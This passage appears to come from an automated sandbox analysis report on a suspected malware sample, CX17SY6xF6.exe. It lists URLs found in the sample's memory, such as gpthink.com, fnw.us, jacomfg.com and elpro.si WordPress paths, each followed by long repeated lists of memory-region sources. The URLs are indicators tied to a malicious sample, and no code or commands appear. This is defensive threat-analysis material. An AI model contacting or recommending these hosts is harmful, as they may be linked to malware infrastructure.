00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/wlwmanifest.xml
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007222000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/Q#
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/W
                  Source: CX17SY6xF6.exe, 00000000.00000003.771314596.0000000007221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/n
                  Source: CX17SY6xF6.exe, 00000000.00000003.683017666.0000000007197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699184166.00000000071D9000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071D9000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/vX
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/v
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/0
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/q
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577691996.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/_
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com//#
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/=#
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/V#
